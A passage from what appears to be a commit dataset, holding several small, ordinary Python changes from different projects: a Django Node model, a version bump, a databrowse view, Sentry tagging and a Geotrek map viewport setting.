site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
<commit_msg>Make Node syncs a noop<commit_after> | import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def __init__(self, *args, **kwargs):
super(Node, self).__init__(*args, **kwargs)
self.no_sync=True
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
| import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
Make Node syncs a noopimport os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def __init__(self, *args, **kwargs):
super(Node, self).__init__(*args, **kwargs)
self.no_sync=True
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
| <commit_before>import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
<commit_msg>Make Node syncs a noop<commit_after>import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def __init__(self, *args, **kwargs):
super(Node, self).__init__(*args, **kwargs)
self.no_sync=True
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
|
7a5d11229ff68735c16993c61c3a44e6b5ece7a8 | simple_model/__version__.py | simple_model/__version__.py | __author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.2'
| __author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.3'
| Fix version preparation to 2.0.3 | Fix version preparation to 2.0.3
| Python | mit | lamenezes/simple-model | __author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.2'
Fix version preparation to 2.0.3 | __author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.3'
| <commit_before>__author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.2'
<commit_msg>Fix version preparation to 2.0.3<commit_after> | __author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.3'
| __author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.2'
Fix version preparation to 2.0.3__author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.3'
| <commit_before>__author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.2'
<commit_msg>Fix version preparation to 2.0.3<commit_after>__author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.3'
|
b706c31fe24e4e940108882f420c0509cce94970 | django_databrowse/plugins/objects.py | django_databrowse/plugins/objects.py | from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}
)
| from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
from django.template import RequestContext
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}, context_instance=RequestContext(request)
)
| Add RequestContext for object detail | Add RequestContext for object detail
| Python | bsd-3-clause | Alir3z4/django-databrowse,Alir3z4/django-databrowse | from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}
)
Add RequestContext for object detail | from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
from django.template import RequestContext
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}, context_instance=RequestContext(request)
)
| <commit_before>from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}
)
<commit_msg>Add RequestContext for object detail<commit_after> | from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
from django.template import RequestContext
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}, context_instance=RequestContext(request)
)
| from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}
)
Add RequestContext for object detailfrom django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
from django.template import RequestContext
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}, context_instance=RequestContext(request)
)
| <commit_before>from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}
)
<commit_msg>Add RequestContext for object detail<commit_after>from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
from django.template import RequestContext
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}, context_instance=RequestContext(request)
)
|
f8ff675f8c9a4ef2b370e5254d33b97261a9d8ca | byceps/util/sentry.py | byceps/util/sentry.py | """
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
sentry_sdk.set_tag('app_mode', app.config.get('APP_MODE'))
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
| """
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
app_mode = app.config.get('APP_MODE')
sentry_sdk.set_tag('app_mode', app_mode)
if app_mode == 'site':
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
| Set Sentry `site_id` tag only in site app mode | Set Sentry `site_id` tag only in site app mode
| Python | bsd-3-clause | homeworkprod/byceps,homeworkprod/byceps,homeworkprod/byceps | """
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
sentry_sdk.set_tag('app_mode', app.config.get('APP_MODE'))
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
Set Sentry `site_id` tag only in site app mode | """
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
app_mode = app.config.get('APP_MODE')
sentry_sdk.set_tag('app_mode', app_mode)
if app_mode == 'site':
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
| <commit_before>"""
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
sentry_sdk.set_tag('app_mode', app.config.get('APP_MODE'))
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
<commit_msg>Set Sentry `site_id` tag only in site app mode<commit_after> | """
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
app_mode = app.config.get('APP_MODE')
sentry_sdk.set_tag('app_mode', app_mode)
if app_mode == 'site':
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
| """
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
sentry_sdk.set_tag('app_mode', app.config.get('APP_MODE'))
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
Set Sentry `site_id` tag only in site app mode"""
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
app_mode = app.config.get('APP_MODE')
sentry_sdk.set_tag('app_mode', app_mode)
if app_mode == 'site':
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
| <commit_before>"""
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
sentry_sdk.set_tag('app_mode', app.config.get('APP_MODE'))
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
<commit_msg>Set Sentry `site_id` tag only in site app mode<commit_after>"""
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
app_mode = app.config.get('APP_MODE')
sentry_sdk.set_tag('app_mode', app_mode)
if app_mode == 'site':
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
|
04b0f21bee9cfef54f4c1138296f86c9694dba95 | geotrek/common/__init__.py | geotrek/common/__init__.py | """
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.1)
| """
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.5)
| Increase viewport margin (10% was not enough for small screens) | Increase viewport margin (10% was not enough for small screens)
| Python | bsd-2-clause | makinacorpus/Geotrek,makinacorpus/Geotrek,mabhub/Geotrek,GeotrekCE/Geotrek-admin,Anaethelion/Geotrek,makinacorpus/Geotrek,johan--/Geotrek,mabhub/Geotrek,camillemonchicourt/Geotrek,mabhub/Geotrek,GeotrekCE/Geotrek-admin,mabhub/Geotrek,Anaethelion/Geotrek,johan--/Geotrek,camillemonchicourt/Geotrek,johan--/Geotrek,makinacorpus/Geotrek,camillemonchicourt/Geotrek,Anaethelion/Geotrek,johan--/Geotrek,GeotrekCE/Geotrek-admin,GeotrekCE/Geotrek-admin,Anaethelion/Geotrek | """
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.1)
Increase viewport margin (10% was not enough for small screens) | """
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.5)
| <commit_before>"""
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.1)
<commit_msg>Increase viewport margin (10% was not enough for small screens)<commit_after> | """
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.5)
| """
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.1)
Increase viewport margin (10% was not enough for small screens)"""
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.5)
| <commit_before>"""
Geotrek startup script.
